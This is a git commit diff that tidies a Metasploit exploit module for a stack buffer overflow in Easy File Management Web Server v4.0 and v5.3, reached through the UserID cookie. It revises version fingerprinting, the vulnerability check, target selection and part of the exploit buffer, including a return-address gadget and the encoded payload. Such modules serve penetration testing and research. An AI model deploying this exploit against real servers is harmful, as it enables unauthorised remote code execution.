Merge pull request #1 from jvazquez-r7/land_3433

TecR0c · TecR0c · commit 278a53c3dae8 · 2014-06-12T00:40:44.000+10:00
Do minor cleanup
diff --git a/modules/exploits/windows/http/efs_fmws_userid_bof.rb b/modules/exploits/windows/http/efs_fmws_userid_bof.rb
@@ -12,16 +12,12 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Easy File Management Web Server v4.0/5.3 Stack Buffer Overflow',
+      'Name'           => 'Easy File Management Web Server Stack Buffer Overflow',
       'Description'    => %q{
-          Easy File Management Web Server contains a stack buffer overflow
-        condition that is triggered as user-supplied input is not properly
-        validated when handling the UserID cookie. This may allow a remote
-        attacker to execute arbitrary code.
-
-        This version exploits:
-        Easy File Management Web Server v4.0
-        Easy File Management Web Server v5.3
+        Easy File Management Web Server v4.0 and v5.3 contains a stack buffer
+        overflow condition that is triggered as user-supplied input is not
+        properly validated when handling the UserID cookie. This may allow a
+        remote attacker to execute arbitrary code.
       },
       'Author'         =>
         [
@@ -42,9 +38,8 @@ def initialize(info = {})
       'Arch'           => ARCH_X86,
       'DefaultOptions' =>
         {
-          'ExitFunction'   => 'process'
+          'EXITFUNC'   => 'process'
         },
-      'Platform'       => 'win',
       'Payload'        =>
         {
           'BadChars'   => "\x00\x0a\x0d;",
@@ -79,34 +74,31 @@ def get_version
     # NOTE: Version 5.3 still reports "4.0" in the "Server" header
     #
 
-    res = send_request_raw 'uri' => '/whatsnew.txt'
-    if res and res.body =~ /What's new in Easy File Management Web Server V(\d\.\d)/
+    version = nil
+    res = send_request_raw({'uri' => '/whatsnew.txt'})
+    if res && res.body =~ /What's new in Easy File Management Web Server V(\d\.\d)/
       version = $1
       vprint_status "#{peer} - Found version: #{version}"
-      return version
     elsif res.headers['server'] =~ /Easy File Management Web Server v(4\.0)/
       version = $1
       vprint_status "#{peer} - Based on Server header: #{version}"
-      return version
-    else
-      fail_with(Failure::NoTarget, "#{peer} - Unable to automatically detect a target")
     end
+
+    version
   end
 
   def check
-
+    code = Exploit::CheckCode::Safe
     version = get_version
-    unless version
-      vprint_status "#{peer} - No response to request"
-      return Exploit::CheckCode::Unknown
+    if version.nil?
+      code = Exploit::CheckCode::Unknown
+    elsif version == "5.3"
+      code = Exploit::CheckCode::Appears
+    elsif version == "4.0"
+      code = Exploit::CheckCode::Appears
     end
-    if version == "5.3"
-      return Exploit::CheckCode::Appears
-    end
-    if version == "4.0"
-      return Exploit::CheckCode::Appears
-    end
-    Exploit::CheckCode::Safe
+
+    code
   end
 
   def exploit
@@ -115,23 +107,23 @@ def exploit
     # Get target version to determine how to reach call/jmp esp
     #
 
+    print_status("#{peer} - Fingerprinting version...")
+    version = get_version
+
     if target.name =~ /Automatic/
-      version = get_version
-      if version =~ /5\.3/
+      if version.nil?
+        fail_with(Failure::NoTarget, "#{peer} - Unable to automatically detect a target")
+      elsif version =~ /5\.3/
         my_target = targets[1]
-      else version =~ /4\.0/
+      elsif version =~ /4\.0/
         my_target = targets[2]
       end
+      print_good("#{peer} - Version #{version} found")
     else
       my_target = target
-    end
-
-    #
-    # Check if target appears to be vulnerable, if not exit
-    #
-
-    unless check == Exploit::CheckCode::Appears || check == Exploit::CheckCode::Detected
-      fail_with(Failure::NoTarget, "#{peer} - Target does not appear to be running fmws v4.0/5.3")
+      unless version && my_target.name.include?(version)
+        print_error("#{peer} - The selected target doesn't match the detected version, trying anyway...")
+      end
     end
 
     #
@@ -150,7 +142,7 @@ def exploit
     sploit << [0x1002466D].pack("V")       # Push eax > retn
     sploit << payload.encoded
 
-    print_status "#{peer} - Trying target #{target.name}..."
+    print_status "#{peer} - Trying target #{my_target.name}..."
 
     #
     # NOTE: Successful HTTP request is required to trigger
